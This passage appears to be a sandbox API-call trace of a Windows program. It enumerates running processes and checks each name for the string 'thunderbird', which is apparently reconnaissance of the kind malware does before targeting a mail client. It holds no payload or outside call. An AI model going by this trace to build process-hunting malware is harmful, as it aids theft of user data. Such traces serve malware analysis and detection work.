(dwFlags=0xf, th32ProcessID=0x0) returned 0x358 [0099.756] Process32FirstW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0099.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.757] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x357d968 [0099.757] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x357d968, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0099.757] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0099.757] StrStrIA (lpFirst="[System Process]", lpSrch="thunderbird") returned 0x0 [0099.757] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0099.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0099.758] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x3574eb0 [0099.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x3574eb0, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0099.758] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0099.758] StrStrIA (lpFirst="System", lpSrch="thunderbird") returned 0x0 [0099.758] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0099.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0099.759] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x357c4b0 [0099.759] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x357c4b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0099.759] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0099.759] StrStrIA (lpFirst="smss.exe", lpSrch="thunderbird") returned 0x0 [0099.759] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.760] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c3f0 [0099.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357c3f0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.760] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.760] StrStrIA (lpFirst="csrss.exe", lpSrch="thunderbird") returned 0x0 [0099.760] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0099.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.761] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c4e0 [0099.761] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x357c4e0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0099.762] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0099.762] StrStrIA (lpFirst="wininit.exe", lpSrch="thunderbird") returned 0x0 [0099.762] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0099.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.762] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c4f8 [0099.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x357c4f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0099.763] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0099.763] StrStrIA (lpFirst="csrss.exe", lpSrch="thunderbird") returned 0x0 [0099.763] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0099.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.763] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c798 [0099.764] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x357c798, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0099.764] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0099.764] StrStrIA (lpFirst="winlogon.exe", lpSrch="thunderbird") returned 0x0 [0099.764] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0099.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.765] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357c660 [0099.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x357c660, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0099.765] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0099.765] StrStrIA (lpFirst="services.exe", lpSrch="thunderbird") returned 0x0 [0099.765] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0099.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.766] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357c690 [0099.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x357c690, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0099.766] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0099.766] StrStrIA (lpFirst="lsass.exe", lpSrch="thunderbird") returned 0x0 [0099.766] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.767] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c708 [0099.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c708, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.767] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.767] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.767] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.768] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c738 [0099.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357c738, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.768] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.768] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="thunderbird") returned 0x0 [0099.768] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0099.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.769] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x357c630 [0099.769] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x357c630, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0099.769] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0099.770] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="thunderbird") returned 0x0 [0099.770] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.771] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c8a0 [0099.771] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c8a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.771] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.771] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.771] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0099.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.772] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574fa0 [0099.772] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x3574fa0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0099.772] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0099.772] StrStrIA (lpFirst="dwm.exe", lpSrch="thunderbird") returned 0x0 [0099.772] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.773] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c720 [0099.773] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.773] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.773] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.773] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.774] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c648 [0099.774] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c648, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.774] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.774] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.774] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.775] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c840 [0099.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.775] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.775] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.775] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.776] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c678 [0099.776] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c678, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.776] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.776] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.776] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.777] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c750 [0099.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c750, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.777] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.778] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.778] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.779] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c768 [0099.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c768, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.779] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.779] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.779] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.780] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c7b0 [0099.780] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c7b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.780] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.780] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.780] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.781] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c780 [0099.781] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c780, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.781] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.781] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.781] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.782] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357c7c8 [0099.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x357c7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0099.782] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0099.782] StrStrIA (lpFirst="svchost.exe", lpSrch="thunderbird") returned 0x0 [0099.782] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0099.783] 